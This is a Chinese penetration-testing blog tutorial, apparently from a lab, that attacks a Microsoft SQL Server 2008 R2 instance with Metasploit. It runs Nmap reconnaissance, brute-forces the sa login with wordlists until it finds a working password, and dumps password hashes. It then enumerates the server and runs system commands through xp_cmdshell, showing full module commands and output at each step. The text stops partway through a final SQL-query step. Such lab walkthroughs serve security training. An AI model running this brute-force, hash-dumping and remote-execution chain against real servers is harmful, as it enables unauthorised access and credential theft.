渗透之——Metasploit渗透MSSQL

最新推荐文章于 2024-07-26 13:45:00 发布
最新推荐文章于 2024-07-26 13:45:00 发布
阅读量1.2w 收藏 33
点赞数 5
分类专栏: 精通渗透系列 文章标签: 渗透 Metasploit MSSQL
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1028386804/article/details/86535576
版权

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86535576

攻击机 kali 192.168.109.137

靶机 Win7_x64 192.168.109.139

数据库 MSSQL 2008 R2

MSSQL运行在TCP的1433端口以及UDP的1434端口

1.使用NMAP对MSSQL进行踩点

这里,我们使用Metasploit自带的db_nmap插件

1-1.首先我们对目标的1433端口进行扫描

db_nmap -sV -p 1433 192.168.109.139

具体操作情况如下:

msf > db_nmap -sV -p 1433 192.168.109.139
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-18 09:56 CST
[*] Nmap: Nmap scan report for 192.168.109.139
[*] Nmap: Host is up (0.00035s latency).
[*] Nmap: PORT     STATE SERVICE  VERSION
[*] Nmap: 1433/tcp open  ms-sql-s Microsoft SQL Server 2008 R2 10.50.4000; SP2
[*] Nmap: MAC Address: 00:0C:29:4A:EB:E0 (VMware)
[*] Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 6.54 seconds

可以看到输出了MSSQL的一些信息。

1-2.扫描1434端口

db_nmap -sU -sV -p 1434 192.168.109.139

具体操作情况如下:

msf > db_nmap -sU -sV -p 1434 192.168.109.139
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-18 09:57 CST
[*] Nmap: Nmap scan report for 192.168.109.139
[*] Nmap: Host is up (0.00032s latency).
[*] Nmap: PORT     STATE SERVICE  VERSION
[*] Nmap: 1434/udp open  ms-sql-m Microsoft SQL Server 10.50.4000.0 (ServerName: LIUYAZHUANG-PC; TCPPort: 1433)
[*] Nmap: MAC Address: 00:0C:29:4A:EB:E0 (VMware)
[*] Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.72 seconds

1-3.使用内置的NMap脚本获得一些关于目标数据库的附加信息

db_nmap -sU --script=ms-sql-info -p 1434 192.168.109.139

具体操作情况如下:

msf > db_nmap -sU --script=ms-sql-info -p 1434 192.168.109.139
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-18 09:59 CST
[*] Nmap: Nmap scan report for 192.168.109.139
[*] Nmap: Host is up (0.00044s latency).
[*] Nmap: PORT     STATE         SERVICE
[*] Nmap: 1434/udp open|filtered ms-sql-m
[*] Nmap: MAC Address: 00:0C:29:4A:EB:E0 (VMware)
[*] Nmap: Host script results:
[*] Nmap: | ms-sql-info:
[*] Nmap: |   Windows server name: LIUYAZHUANG-PC
[*] Nmap: |   192.168.109.139\MSSQLSERVER:
[*] Nmap: |     Instance name: MSSQLSERVER
[*] Nmap: |     Version:
[*] Nmap: |       name: Microsoft SQL Server 2008 R2 SP2
[*] Nmap: |       number: 10.50.4000.00
[*] Nmap: |       Product: Microsoft SQL Server 2008 R2
[*] Nmap: |       Service pack level: SP2
[*] Nmap: |       Post-SP patches applied: false
[*] Nmap: |     TCP port: 1433
[*] Nmap: |     Named pipe: \\192.168.109.139\pipe\sql\query
[*] Nmap: |_    Clustered: false
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.62 seconds

2.使用Metasploit的模块进行扫描

这里,我们用到可Metasploit的mssql_ping

use auxiliary/scanner/mssql/mssql_ping
show options
set RHOSTS 192.168.109.139
run

具体操作情况如下:

msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(scanner/mssql/mssql_ping) > show options

Module options (auxiliary/scanner/mssql/mssql_ping):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target address range or CIDR identifier
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              1                yes       The number of concurrent threads
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

msf auxiliary(scanner/mssql/mssql_ping) > set RHOSTS 192.168.109.139
RHOSTS => 192.168.109.139
msf auxiliary(scanner/mssql/mssql_ping) > 
msf auxiliary(scanner/mssql/mssql_ping) > 
msf auxiliary(scanner/mssql/mssql_ping) > run

[*] 192.168.109.139:      - SQL Server information for 192.168.109.139:
[+] 192.168.109.139:      -    ServerName      = LIUYAZHUANG-PC
[+] 192.168.109.139:      -    InstanceName    = MSSQLSERVER
[+] 192.168.109.139:      -    IsClustered     = No
[+] 192.168.109.139:      -    Version         = 10.50.4000.0
[+] 192.168.109.139:      -    tcp             = 1433
[+] 192.168.109.139:      -    np              = \\LIUYAZHUANG-PC\pipe\sql\query
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/mssql/mssql_ping) >

3.爆破MSSQL密码

这里,用到的是Metasploit的mssql_login模块。

MSSQL的默认用户名为sa,默认密码为空,所以我们先测试下用户名为sa,密码为空的情况:

use auxiliary/scanner/mssql/mssql_login
show options
set RHOSTS 192.168.109.139
run

具体操作情况如下:

msf auxiliary(scanner/mssql/mssql_ping) > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(scanner/mssql/mssql_login) > show options

Module options (auxiliary/scanner/mssql/mssql_login):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   BLANK_PASSWORDS      false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED     5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS         false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS          false            no        Add all passwords in the current database to the list
   DB_ALL_USERS         false            no        Add all users in the current database to the list
   PASSWORD                              no        A specific password to authenticate with
   PASS_FILE                             no        File containing passwords, one per line
   RHOSTS                                yes       The target address range or CIDR identifier
   RPORT                1433             yes       The target port (TCP)
   STOP_ON_SUCCESS      false            yes       Stop guessing when a credential works for a host
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              1                yes       The number of concurrent threads
   USERNAME                              no        A specific username to authenticate as
   USERPASS_FILE                         no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS         false            no        Try the username as the password for all users
   USER_FILE                             no        File containing usernames, one per line
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)
   VERBOSE              true             yes       Whether to print output for all attempts

msf auxiliary(scanner/mssql/mssql_login) > set RHOSTS 192.168.109.139
RHOSTS => 192.168.109.139
msf auxiliary(scanner/mssql/mssql_login) > run

[*] 192.168.109.139:1433  - 192.168.109.139:1433 - MSSQL - Starting authentication scanner.
[*] Error: 192.168.109.139: Metasploit::Framework::LoginScanner::Invalid Cred details can't be blank, Cred details can't be blank (Metasploit::Framework::LoginScanner::MSSQL)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/mssql/mssql_login) >

可以看到登录失败,所以目标数据库的账户和密码不是默认的。

这里,我们继续构造目标数据库的用户名字典和密码字典,分别为:/root/user.txt 和 /root/pass.txt

接下来,我们使用用户名字典和密码字典爆破目标数据库

use auxiliary/scanner/mssql/mssql_login
show options
set RHOSTS 192.168.109.139
set USER_FILE /root/user.txt
set PASS_FILE /root/pass.txt
run

具体操作情况如下:

msf > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(scanner/mssql/mssql_login) > show options

Module options (auxiliary/scanner/mssql/mssql_login):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   BLANK_PASSWORDS      false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED     5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS         false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS          false            no        Add all passwords in the current database to the list
   DB_ALL_USERS         false            no        Add all users in the current database to the list
   PASSWORD                              no        A specific password to authenticate with
   PASS_FILE                             no        File containing passwords, one per line
   RHOSTS               192.168.109.139  yes       The target address range or CIDR identifier
   RPORT                1433             yes       The target port (TCP)
   STOP_ON_SUCCESS      false            yes       Stop guessing when a credential works for a host
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              1                yes       The number of concurrent threads
   USERNAME                              no        A specific username to authenticate as
   USERPASS_FILE                         no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS         false            no        Try the username as the password for all users
   USER_FILE                             no        File containing usernames, one per line
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)
   VERBOSE              true             yes       Whether to print output for all attempts

msf auxiliary(scanner/mssql/mssql_login) > set USER_FILE /root/user.txt
USER_FILE => /root/user.txt
msf auxiliary(scanner/mssql/mssql_login) > set PASS_FILE /root/pass.txt
PASS_FILE => /root/pass.txt
msf auxiliary(scanner/mssql/mssql_login) > run

[*] 192.168.109.139:1433  - 192.168.109.139:1433 - MSSQL - Starting authentication scanner.
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\xiaoming:liuyazhuang (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\xiaoming:liu (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\xiaoming:123456 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\xiaoming:3874378 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\xiaoming:Cdmn@339 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\xiaoming:@@@@@ (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\xiaoming:1111 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\xiaoming:236726 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\xiaoming:23473748 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\xiaoming:223u4343 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\liuyazhuang:liuyazhuang (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\liuyazhuang:liu (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\liuyazhuang:123456 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\liuyazhuang:3874378 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\liuyazhuang:Cdmn@339 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\liuyazhuang:@@@@@ (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\liuyazhuang:1111 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\liuyazhuang:236726 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\liuyazhuang:23473748 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\liuyazhuang:223u4343 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\jack:liuyazhuang (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\jack:liu (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\jack:123456 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\jack:3874378 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\jack:Cdmn@339 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\jack:@@@@@ (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\jack:1111 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\jack:236726 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\jack:23473748 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\jack:223u4343 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\lyz:liuyazhuang (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\lyz:liu (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\lyz:123456 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\lyz:3874378 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\lyz:Cdmn@339 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\lyz:@@@@@ (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\lyz:1111 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\lyz:236726 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\lyz:23473748 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\lyz:223u4343 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\administrator:liuyazhuang (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\administrator:liu (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\administrator:123456 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\administrator:3874378 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\administrator:Cdmn@339 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\administrator:@@@@@ (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\administrator:1111 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\administrator:236726 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\administrator:23473748 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\administrator:223u4343 (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\sa:liuyazhuang (Incorrect: )
[-] 192.168.109.139:1433  - 192.168.109.139:1433 - LOGIN FAILED: WORKSTATION\sa:liu (Incorrect: )
[+] 192.168.109.139:1433  - 192.168.109.139:1433 - Login Successful: WORKSTATION\sa:123456
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/mssql/mssql_login) >

可以看到目标数据库的用户名为sa,密码为123456

4.查找/捕获服务器的口令

这里,用到的是Metasploit的mssql_hashdump模块。

use auxiliary/scanner/mssql/mssql_hashdump
show options
set RHOSTS 192.168.109.139
set PASSWORD 123456
run

具体操作情况如下:

msf auxiliary(scanner/mssql/mssql_login) > use auxiliary/scanner/mssql/mssql_hashdump 
msf auxiliary(scanner/mssql/mssql_hashdump) > show options

Module options (auxiliary/scanner/mssql/mssql_hashdump):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target address range or CIDR identifier
   RPORT                1433             yes       The target port (TCP)
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              1                yes       The number of concurrent threads
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

msf auxiliary(scanner/mssql/mssql_hashdump) > set RHOSTS 192.168.109.139
RHOSTS => 192.168.109.139
msf auxiliary(scanner/mssql/mssql_hashdump) > set PASSWORD 123456
PASSWORD => 123456
msf auxiliary(scanner/mssql/mssql_hashdump) > run

[*] 192.168.109.139:1433  - Instance Name: nil
[+] 192.168.109.139:1433  - Saving mssql05 = sa:0100803a5accdbbe36fd02ade28e2e4ed463f311238ab3410a92
[+] 192.168.109.139:1433  - Saving mssql05 = ##MS_PolicyTsqlExecutionLogin##:0100ab666dffdfa0f0ce5d9dc217abc8b87bface1efda74dba9c
[+] 192.168.109.139:1433  - Saving mssql05 = ##MS_PolicyEventProcessingLogin##:0100ad950534143cd9e69553cd7715b5d0b68c54032124ee8992
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/mssql/mssql_hashdump) >

接下来,我们就可以使用其他工具爆破这些密码了。

5.浏览MSSQL

这里用到的是Metasploit的mssql_enum模块。

use auxiliary/admin/mssql/mssql_enum
show options
set RHOST 192.168.109.139
set PASSWORD 123456
run

具体操作情况如下:

msf > use auxiliary/admin/mssql/mssql_enum
msf auxiliary(admin/mssql/mssql_enum) > show options

Module options (auxiliary/admin/mssql/mssql_enum):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOST                                 yes       The target address
   RPORT                1433             yes       The target port (TCP)
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

msf auxiliary(admin/mssql/mssql_enum) > set RHOST 192.168.109.139
RHOST => 192.168.109.139
msf auxiliary(admin/mssql/mssql_enum) > set PASSWORD 123456
PASSWORD => 123456
msf auxiliary(admin/mssql/mssql_enum) > run

[*] 192.168.109.139:1433 - Running MS SQL Server Enumeration...
[*] 192.168.109.139:1433 - Version:
[*]	Microsoft SQL Server 2008 R2 (SP2) - 10.50.4000.0 (X64) 
[*]		Jun 28 2012 08:36:30 
[*]		Copyright (c) Microsoft Corporation
[*]		Express Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) (Hypervisor)
[*] 192.168.109.139:1433 - Configuration Parameters:
[*] 192.168.109.139:1433 - 	C2 Audit Mode is Not Enabled
[*] 192.168.109.139:1433 - 	xp_cmdshell is Enabled
[*] 192.168.109.139:1433 - 	remote access is Enabled
[*] 192.168.109.139:1433 - 	allow updates is Not Enabled
[*] 192.168.109.139:1433 - 	Database Mail XPs is Not Enabled
[*] 192.168.109.139:1433 - 	Ole Automation Procedures are Not Enabled
[*] 192.168.109.139:1433 - Databases on the server:
[*] 192.168.109.139:1433 - 	Database name:master
[*] 192.168.109.139:1433 - 	Database Files for master:
[*] 192.168.109.139:1433 - 		d:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\master.mdf
[*] 192.168.109.139:1433 - 		d:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\mastlog.ldf
[*] 192.168.109.139:1433 - 	Database name:tempdb
[*] 192.168.109.139:1433 - 	Database Files for tempdb:
[*] 192.168.109.139:1433 - 		d:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\tempdb.mdf
[*] 192.168.109.139:1433 - 		d:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\templog.ldf
[*] 192.168.109.139:1433 - 	Database name:model
[*] 192.168.109.139:1433 - 	Database Files for model:
[*] 192.168.109.139:1433 - 		d:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\model.mdf
[*] 192.168.109.139:1433 - 		d:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\modellog.ldf
[*] 192.168.109.139:1433 - 	Database name:msdb
[*] 192.168.109.139:1433 - 	Database Files for msdb:
[*] 192.168.109.139:1433 - 		d:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\MSDBData.mdf
[*] 192.168.109.139:1433 - 		d:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\DATA\MSDBLog.ldf
[*] 192.168.109.139:1433 - System Logins on this Server:
[*] 192.168.109.139:1433 - 	sa
[*] 192.168.109.139:1433 - 	##MS_SQLResourceSigningCertificate##
[*] 192.168.109.139:1433 - 	##MS_SQLReplicationSigningCertificate##
[*] 192.168.109.139:1433 - 	##MS_SQLAuthenticatorCertificate##
[*] 192.168.109.139:1433 - 	##MS_PolicySigningCertificate##
[*] 192.168.109.139:1433 - 	##MS_SmoExtendedSigningCertificate##
[*] 192.168.109.139:1433 - 	##MS_PolicyTsqlExecutionLogin##
[*] 192.168.109.139:1433 - 	NT AUTHORITY\SYSTEM
[*] 192.168.109.139:1433 - 	NT SERVICE\MSSQLSERVER
[*] 192.168.109.139:1433 - 	liuyazhuang-PC\liuyazhuang
[*] 192.168.109.139:1433 - 	BUILTIN\Users
[*] 192.168.109.139:1433 - 	##MS_PolicyEventProcessingLogin##
[*] 192.168.109.139:1433 - 	##MS_AgentSigningCertificate##
[*] 192.168.109.139:1433 - Disabled Accounts:
[*] 192.168.109.139:1433 - 	##MS_PolicyTsqlExecutionLogin##
[*] 192.168.109.139:1433 - 	##MS_PolicyEventProcessingLogin##
[*] 192.168.109.139:1433 - No Accounts Policy is set for:
[*] 192.168.109.139:1433 - 	All System Accounts have the Windows Account Policy Applied to them.
[*] 192.168.109.139:1433 - Password Expiration is not checked for:
[*] 192.168.109.139:1433 - 	sa
[*] 192.168.109.139:1433 - 	##MS_PolicyTsqlExecutionLogin##
[*] 192.168.109.139:1433 - 	##MS_PolicyEventProcessingLogin##
[*] 192.168.109.139:1433 - System Admin Logins on this Server:
[*] 192.168.109.139:1433 - 	sa
[*] 192.168.109.139:1433 - 	NT AUTHORITY\SYSTEM
[*] 192.168.109.139:1433 - 	NT SERVICE\MSSQLSERVER
[*] 192.168.109.139:1433 - 	liuyazhuang-PC\liuyazhuang
[*] 192.168.109.139:1433 - Windows Logins on this Server:
[*] 192.168.109.139:1433 - 	NT AUTHORITY\SYSTEM
[*] 192.168.109.139:1433 - 	liuyazhuang-PC\liuyazhuang
[*] 192.168.109.139:1433 - Windows Groups that can logins on this Server:
[*] 192.168.109.139:1433 - 	NT SERVICE\MSSQLSERVER
[*] 192.168.109.139:1433 - 	BUILTIN\Users
[*] 192.168.109.139:1433 - Accounts with Username and Password being the same:
[*] 192.168.109.139:1433 - 	No Account with its password being the same as its username was found.
[*] 192.168.109.139:1433 - Accounts with empty password:
[*] 192.168.109.139:1433 - 	No Accounts with empty passwords where found.
[*] 192.168.109.139:1433 - Stored Procedures with Public Execute Permission found:
[*] 192.168.109.139:1433 - 	sp_replsetsyncstatus
[*] 192.168.109.139:1433 - 	sp_replcounters
[*] 192.168.109.139:1433 - 	sp_replsendtoqueue
[*] 192.168.109.139:1433 - 	sp_resyncexecutesql
[*] 192.168.109.139:1433 - 	sp_prepexecrpc
[*] 192.168.109.139:1433 - 	sp_repltrans
[*] 192.168.109.139:1433 - 	sp_xml_preparedocument
[*] 192.168.109.139:1433 - 	xp_qv
[*] 192.168.109.139:1433 - 	xp_getnetname
[*] 192.168.109.139:1433 - 	sp_releaseschemalock
[*] 192.168.109.139:1433 - 	sp_refreshview
[*] 192.168.109.139:1433 - 	sp_replcmds
[*] 192.168.109.139:1433 - 	sp_unprepare
[*] 192.168.109.139:1433 - 	sp_resyncprepare
[*] 192.168.109.139:1433 - 	sp_createorphan
[*] 192.168.109.139:1433 - 	xp_dirtree
[*] 192.168.109.139:1433 - 	sp_replwritetovarbin
[*] 192.168.109.139:1433 - 	sp_replsetoriginator
[*] 192.168.109.139:1433 - 	sp_xml_removedocument
[*] 192.168.109.139:1433 - 	sp_repldone
[*] 192.168.109.139:1433 - 	sp_reset_connection
[*] 192.168.109.139:1433 - 	xp_fileexist
[*] 192.168.109.139:1433 - 	xp_fixeddrives
[*] 192.168.109.139:1433 - 	sp_getschemalock
[*] 192.168.109.139:1433 - 	sp_prepexec
[*] 192.168.109.139:1433 - 	xp_revokelogin
[*] 192.168.109.139:1433 - 	sp_resyncuniquetable
[*] 192.168.109.139:1433 - 	sp_replflush
[*] 192.168.109.139:1433 - 	sp_resyncexecute
[*] 192.168.109.139:1433 - 	xp_grantlogin
[*] 192.168.109.139:1433 - 	sp_droporphans
[*] 192.168.109.139:1433 - 	xp_regread
[*] 192.168.109.139:1433 - 	sp_getbindtoken
[*] 192.168.109.139:1433 - 	sp_replincrementlsn
[*] 192.168.109.139:1433 - Instances found on this server:
[*] 192.168.109.139:1433 - 	MSSQLSERVER
[*] 192.168.109.139:1433 - Default Server Instance SQL Server Service is running under the privilege of:
[*] 192.168.109.139:1433 - 	NT AUTHORITY\NETWORKSERVICE
[*] Auxiliary module execution completed

6.重新载入xp_cmd功能

这里用到的是Metasploit的mssql_exec, 通过重新载入禁用的xp_cmdshell功能来运行系统级的命令

use auxiliary/admin/mssql/mssql_exec
show options
set CMD 'ipconfig'
set RHOST 192.168.109.139
set PASSWORD 123456
run

具体操作情况如下:

msf > use auxiliary/admin/mssql/mssql_exec 
msf auxiliary(admin/mssql/mssql_exec) > show options

Module options (auxiliary/admin/mssql/mssql_exec):

   Name                 Current Setting                       Required  Description
   ----                 ---------------                       --------  -----------
   CMD                  cmd.exe /c echo OWNED > C:\owned.exe  no        Command to execute
   PASSWORD                                                   no        The password for the specified username
   RHOST                                                      yes       The target address
   RPORT                1433                                  yes       The target port (TCP)
   TDSENCRYPTION        false                                 yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa                                    no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false                                 yes       Use windows authentification (requires DOMAIN option set)

msf auxiliary(admin/mssql/mssql_exec) > set CMD 'ipconfig'
CMD => ipconfig
msf auxiliary(admin/mssql/mssql_exec) > set RHOST 192.168.109.139
RHOST => 192.168.109.139
msf auxiliary(admin/mssql/mssql_exec) > set PASSWORD 123456
PASSWORD => 123456
msf auxiliary(admin/mssql/mssql_exec) > run

[*] 192.168.109.139:1433 - SQL Query: EXEC master..xp_cmdshell 'ipconfig'



 output
 ------
 
 Windows IP M�n
 
 
 *g�w�M�hV VPN - VPN Client:
 
    �ZSO�r`  . . . . . . . . . . . . : �ZSO�]�e_
    ޏ�cyr�[�v DNS T . . . . . . . : 
 
 �N*YQ�M�hV Bluetooth Q�~ޏ�c:
 
    �ZSO�r`  . . . . . . . . . . . . : �ZSO�]�e_
    ޏ�cyr�[�v DNS T . . . . . . . : 
 
 �N*YQ�M�hV ,g0Wޏ�c:
 
    ޏ�cyr�[�v DNS T . . . . . . . : localdomain
    ,g0W���c IPv6 0W@W. . . . . . . . : fe80::ccb2:bf07:23ba:9925%11
    IPv4 0W@W . . . . . . . . . . . . : 192.168.109.139
    P[Q�cx  . . . . . . . . . . . . : 255.255.255.0
    ؞��QsQ. . . . . . . . . . . . . : 192.168.109.2
 
 ��S��M�hV isatap.{5761F2CD-B72F-4D63-9594-8FFF71AE3A2D}:
 
    �ZSO�r`  . . . . . . . . . . . . : �ZSO�]�e_
    ޏ�cyr�[�v DNS T . . . . . . . : 
 
 ��S��M�hV ,g0Wޏ�c* 6:
 
    �ZSO�r`  . . . . . . . . . . . . : �ZSO�]�e_
    ޏ�cyr�[�v DNS T . . . . . . . : 
 
 ��S��M�hV isatap.localdomain:
 
    �ZSO�r`  . . . . . . . . . . . . : �ZSO�]�e_
    ޏ�cyr�[�v DNS T . . . . . . . : localdomain
 
 ��S��M�hV isatap.{BE1D7C8C-9941-432D-97A0-B5A8B6A37A0B}:
 
    �ZSO�r`  . . . . . . . . . . . . : �ZSO�]�e_
    ޏ�cyr�[�v DNS T . . . . . . . : 
 

[*] Auxiliary module execution completed
msf auxiliary(admin/mssql/mssql_exec) >

7.运行SQL查询命令

use auxiliary/admin/mssql/mssql_sql
show options
set RHOST 192.168.109.139
set PASSWORD 123456
run

具体操作情况如下:

msf > use auxiliary/admin/mssql/mssql_sql
msf auxiliary(admin/mssql/mssql_sql) > show options

Module options (auxiliary/admin/mssql/mssql_sql):

   Name                 Current Setting   Required  Description
   ----                 ---------------   --------  -----------
   PASSWORD                               no        The password for the specified username
   RHOST                                  yes       The target address
   RPORT                1433              yes       The target port (TCP)
